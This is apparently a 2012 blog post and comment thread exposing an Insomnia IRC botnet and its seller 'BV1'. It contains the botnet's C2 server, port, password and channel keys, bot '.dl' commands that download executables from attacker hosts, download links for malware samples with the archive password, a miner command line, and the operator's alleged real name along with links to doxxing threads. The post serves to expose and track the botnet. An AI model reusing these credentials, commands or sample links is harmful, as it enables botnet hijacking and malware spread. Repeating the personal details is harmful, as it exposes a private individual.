we.be.thu.gs(Insomnia bot hosted in Netherland Amsterdam Ecatel Ltd)

A guy posted in this thread http://www.exposedbotnets.com/2012/04/insomnia-irc-bot-v113-manual.html about another Insomnia botnet server u can read in comments for more

Resolved : [we.be.thu.gs] To [80.82.79.21]

Bv1’s insomnia bot server
Server we.be.thu.gs ssl required to connect. use xchat or install it on mirc accept his invalid certificate
Port 443
Password fuckyou
To conect do this /server we.be.thu.gs:+443
channels :
#US
#CA
#RU
#BR
#b8896 306039

Local users: Current Local Users: 1732 Max: 2638
Global users: Current Global Users: 1741 Max: 2647

Now talking in #b8896
Topic On: [ #b8896 ] [ !acdaefc6865a0e54646f63ba8b894c5a383235a46b67 ]
Topic By: [ b ]
Modes On: [ #b8896 12] [ +smntrSMuNTk 306039 12]

More about the hecker:

[z] (ghfghgf@b.uni.net): b
* [z] ~#b8896
* [z] HTTP.1.1 :HTTP 1.1
* [z] is using a Secure Connection
* [z] idle 00:11:36, signon: Tue Apr 10 10:06:54
* [z] End of WHOIS list.

Here are the samples
http://www.mediafire.com/?27a0thq2pzu9kp0 Password:virus

UPDATE:
new domains used from same guy
irc.bv1.co wich resolves to 68.178.232.99 or United States Scottsdale Godaddy.com Inc
bv1.biz wich relosves to 176.31.32.148 or France Paris Ovh Systems

irc.bv1.us wich is ianctive for the moment

Channel:

here the pastebin log from our anonymous friend

* Topic for #BV1 is: d3F6Q29zTyt3Nm5EcmNPb3dxekRwTU80dzdqRHZNSzJ3cVBDbzhPN3c3dkR1OEtpdzdqRHFjTyt3NzdEbzhPK3dxSER2OE85dzduRHJjT293cUxEcjhPandxUER1TU9qdzd6RHBjT3Z3cUxEdU1PMHc3akRzQT09fDk5ODYzMTQw
* Topic for #BV1 set by BV1 at Thu Apr 19 06:40:09 2012
* [BorBot] (BorBot@HTTP-AC028863.lsanca.fios.verizon.net): BorBot :BorBot
* [BorBot] @#BV1 
* [BorBot] HTTP.1.1 :HTTP 1.1
* [BorBot] is using a Secure Connection
* [BorBot] idle 11:49:41, signon: Tue Apr 24 10:05:08
* [BorBot] End of WHOIS list.
* [BV1] (glmbrs@BV1): ...
* [BV1] ~#BV1 ~#US 
* [BV1] HTTP.1.1 :HTTP 1.1
* [BV1] is a Network Administrator
* [BV1] is available for help.
* [BV1] is using a Secure Connection
* [BV1] idle 00:18:28, signon: Tue Apr 24 00:14:38
* [BV1] End of WHOIS list.


Topic for #us is: d3F6Q29zT213cXpDcjhPbHc2TER2OE80dzYzRG9NT2d3Ny9Ec0E9PXw5OTg2MzE0MA==

* Topic for #us set by Bv1 at Thu Mar 29 04:15:44 2012

we.be.thu.gs redirected to local server, and topics placed on correct channels.
On join of #BV1, bot visited http://terror-squad.co/topic.txt
Further encrypted topic in file: d3F6Q29zTzV3N3pDck1Pa3c3akR1TU84d3JiQ284S2p3N3ZEdThPN3dxTER1TU9wdzc3RHZzT2p3NzdDb2NPL3c3M0R1Y090dzZqQ29zT3Z3NlBDbzhPcXc2WERvTU9wd3I3Q29zT3B3N1REcWNLc3dyN0N0Y09xd3JuQ3VzSzF3NjNEcU1LOHdyN0N1OE91d3JUQ3Y4Syt3NnJEcjhPdnc2L0N2Y0svd3I3RHFjT3B3cnJDdXNPdHc2N0N1c0s3dzY3RHFNT3d3cXpDb3NPNXc3L0Ryc0tzdzZQRG9zT3d3cXpDb3NPL3c2UER2c080dzdEQ3JNS2l3NnJEdU1POHc3QT18OTk4NjMxNDA=

Bot then downloaded http://terror-squad.co/file2.exe, and joined #US, which was the country code received from the api.

<n{US|XP-32a}kjibmbk> Attempting to perform commands from url: http://www.terror-squad.co/topic.txt.
<n{US|XP-32a}kjibmbk> Bot file is already up to date: 29F569AD027B832FCCC132EE66AB67BD == 29F569AD027B832FCCC132EE66AB67BD

New action, as I write this up.
<BV1> .dl http://www.terror-squad.co/5302b1ac63e7e4c58c50555aa96d847c.exe
That's a bot that attempts to download a bitcoin miner.
http://malwr.com/analysis/c38456aa1b1f93fa9da88cb3653a6fd5/
From http://api.cld.me/FoX8/download/bitcoin-miner.exe
Too bad it's not there anymore.

Samples are hosted here:
http://terror-squad.co/ wich resolves to 80.82.64.71 and still ecatel
http://80.82.64.71/~terrorsq/

Credits for this goes to the anonymous guy from here http://www.exposedbotnets.com/2012/04/insomnia-irc-bot-v113-manual.html

hosting infos:
http://whois.domaintools.com/80.82.79.21

Categories: Uncategorized

39 Comments

Anonymous - April 18, 2012 at 8:06 pm

Here are the samples
http://www.mediafire.com/?27a0thq2pzu9kp0 Password:virus
facebook hacker.exe is either insomnia 2.0 or 2.10 and is unecrypted.
hannah sex tape.exe is probably insomnia 2.20, and is crypted and pumped up to 35mb, probably to look more like a movie and to avoid virustotal.
Both connect to we.be.thu.gs channel #b8896 with password 306039. This means the auth host is most likely ghfghgf@b.uni.net

Anonymous - April 18, 2012 at 8:11 pm

Another note, Bv1 is the guy selling the bins on hackforums, and is selling this hosting as well. All the #US, #BR, #CA, etc channels belong to him, and the channel #b8896 belongs to the guy b, who bought the bin and hosting from him.

Pig - April 18, 2012 at 10:45 pm

job well done everything is detailed from irc infos to samples used to infect people
i m adding the link to the post now
feel free to post nets anytime

Anonymous - April 18, 2012 at 10:54 pm

That looks like ngrbot, or are they the same bots(Insomnia-ngr)?

They seem to have the same functions and names.

Pig - April 18, 2012 at 11:10 pm

only language is diferent Insomnia is coded in .NET

Anonymous - April 19, 2012 at 1:27 am

I can post two more, just small shitty http nets.
http://www.mediafire.com/?f25869md9bv3q9d password: virus
Loader.exe is a .net http bot, that connects to global-carding.ru/gate.php. Used for ddosing and loading malware (mainly RATS). Most files to be installed are loaded from webcamchat4free.in.
Some packet captures of it in action http://www.mediafire.com/?t8obhi8jttvh1l5

3.exe is hardly worth mentioning. It connects to http://anonproducts.info/xx/gate.php. If you visit http://anonproducts.info/xx/, you'll see it's stats. They may not be real, as the accessible command panel http://anonproducts.info/xx/command.php, has a facebook click jacking attempt set up on it, suggesting that it was exposed purposefully.
anonproducts.info is a HF java "driveby" site, which I have been documenting on virustotal with the tag #anonproducts
Both pretty shit, but you might find them interesting.

Pig - April 19, 2012 at 12:34 pm

alot of people will find your posts interessing belive me
and alot of people will be pissed lol

Pig - April 19, 2012 at 1:08 pm

anonproducts.info is the domain used for the loader i m opening a new thread with panel pictures and your samples now

Anonymous - April 25, 2012 at 6:39 pm

Latest domain, bv1.biz, appears to have his legit contact info. Just though I should point that out.

Pig - April 25, 2012 at 6:56 pm

yes i can see his domains from here http://whois.domaintools.com/176.31.32.148 lol
hosting in France Paris Ovh Systems
very nice find

Pig - April 25, 2012 at 7:56 pm

looks like this thread is geting alot of attention from 4chan and theyre posting personal infos of the botnet owner lol
http://boards.4chan.org/g/res/24442662

Anonymous - April 25, 2012 at 8:27 pm

Use this link so that people who see it after can view it. https://archive.installgentoo.net/g/thread/24442662

Pig - April 25, 2012 at 8:33 pm

alot of information on that guy lol

Amonynous - April 25, 2012 at 11:16 pm

This same person appears to own and sell the somewhat infamous Blackshades RAT malware as well.

He seems to own a ton of domains and servers, and his name is indeed Brendan M. Johnston.

More info coming soon.

Anonymous - April 26, 2012 at 1:25 pm

Ecatel is part of the Russian nbn that is known host spambots and other malware.

Nothing will happen, also to the guy above it's not hard to fake whois information.

Pig - April 26, 2012 at 4:10 pm

u think he's so smart to fake his infos ? lol

Anonymous - April 26, 2012 at 11:07 pm

Oh, I guess there were two botnets on that host.
http://www.myown.cryptic-hosting.com/build.rar connects to myown.cryptic-hosting.com/vip/admin/
http://anubis.iseclab.org/?action=result&task_id=1f3d54d838c017474d9cec1d0198b92a6&format=html
Maybe we should hold off on releasing all this and see how many we can find out before they notice us.

Anonymous - April 26, 2012 at 11:21 pm

It's the gift that keeps on giving. I don't even know what this is, but he wants it installed on something. http://dl.dropbox.com/u/73806662/project2.exe

Anonymous - April 27, 2012 at 12:06 am

I'll wait a while before posting this so I don't end up spamming this with 20 comments.
.dl http://dl.dropbox.com/u/73806662/project9.exe -t 20
http://dl.dropbox.com/u/76027986/BS-Server.exe -t 43200
He might be removing them from dropbox, so I'll zip them all up once he stops.

(8:38:55 PM) Zain: .dl http://dl.dropbox.com/u/73806662/maintttt.exe -t 43200
(8:39:53 PM) Zain: .dl http://dl.dropbox.com/u/73806662/test8888jhon.exe -t 43200
I think he's done now.
Heres everything I've got so far, from the dropbox or the site with the bots. http://www.mediafire.com/?656qprn0bqoadco
Pass is virus as usual.
Only one I couldn't get was BS-server.exe

Pig - April 27, 2012 at 10:43 am

http://myown.cryptic-hosting.com/vvip/ this is ùBOT
http://myown.cryptic-hosting.com/vvip/img/logo.png
the bs-server maybe blackshades so forget it
for the rest i m checking them later
if u follow like this he's prob give up and forget bots lol

Pig - April 27, 2012 at 10:55 am

microsoft.exe conects to horta21.zapto.org TCP port 39

the rest are not active
1horta21.zapto.org
2horta21.zapto.org
3horta21.zapto.org
4horta21.zapto.org
5horta21.zapto.org
6horta21.zapto.org

Pig - April 27, 2012 at 11:14 am

build.exe is maybe umbra loader or other delphi http malware
http://176.31.147.53/vip/admin/ this is not there anymore

Anonymous - April 27, 2012 at 4:47 pm

The new version of the bitcoin miner has shown up on terror-squad.co. It's 40895.exe and this time has a working miner download link. I can't seem to worker details though.

BV1 - April 28, 2012 at 6:06 am

Congrats on your hard work, you genuinely fucked me up quite a bit.

To those interested, I don't spread, it was a client of mine on 4chan I suppose, but I'm shutting the server down regardless.

Fuck dealing with this shit.

Pig - April 28, 2012 at 2:48 pm

u are welcome bv1 lol

Anonymous - April 28, 2012 at 4:30 pm

BV1 you seem pretty upset. Also, why were you installing on other peoples bots?
Apr 28 02:58:17 .dl http://thu.gs/tesr3.exe
Just because they are hosted on your server doesn't mean you can just do what you please with them.

Pig - April 28, 2012 at 6:19 pm

this is always the case lol

Anonymous - April 28, 2012 at 6:26 pm

Posting yet another gift from this botnet. http://66.96.206.18/files1/Flash1.exe Connects to http://liilli.in/ has the user-Agent: InetHTTP/1.0
I'm not too sure on what it does as it crashes most of the processes on my vm and starts hammering google with http requests when I run it.

Pig - April 28, 2012 at 6:31 pm

i downloaded 2 exe files from this link that's why it tokes some min to show your post lol

Pig - April 28, 2012 at 7:26 pm

Resolved : [thu.gs] To [80.82.64.71]
this is the domain posted by anonymous guy inside u have some samples http://thu.gs

Anonymous - April 28, 2012 at 9:24 pm

Blah blah blah botnet http://dl.dropbox.com/u/73806662/testandro.exe
Connects to img196-imageshack.us/pannel/image.php
Note that the lack of sub-domain.
Downloaded dl.dropbox.com/u/76205929/rk.cmd.dll
Dunno what for.
Then downloaded gwassnet.co.cc/NoTouch.exe
Which is a self extracting rar archive bitcoin miner.
svchost2.exe -o http://eu.triplemining.com:8344 -u trap258_gwas -p himom
111
0

Pig - April 28, 2012 at 9:43 pm

very nice shot lol
i m opening new thread for this

BV1 - April 28, 2012 at 11:21 pm

That's from me? Or unrelated. Don't recognize it.

Anonymous - April 29, 2012 at 2:14 am

They are known to steal bots from their customers, last time it happened it was regarding the rat they are selling(BS rat)

After that it was cracked and posted.

Anonymous - April 29, 2012 at 11:11 pm

Don't you think there would be many more bots if I they stole bots? This is a couple hundred bots, they have thousands of customers. They should have tens of thousands of bots.

Pig - April 29, 2012 at 11:52 pm

dont worry is question of time for other domains to be listed in this blog:-)

Anonymous - April 30, 2012 at 3:57 am

If you read up it's a known fact they steal bots and had a little function implemented into the BSrat that allowed them to send commands to your bots without you knowing.

Also they would be sending to multiply servers.

Pig - May 12, 2012 at 7:47 pm

looks like BV1's infos are exposed allready http://hpaste.org/68250

Anonymous - May 16, 2012 at 4:00 pm

^ i lold.

What a retard, puts real info on whois.

Comments are closed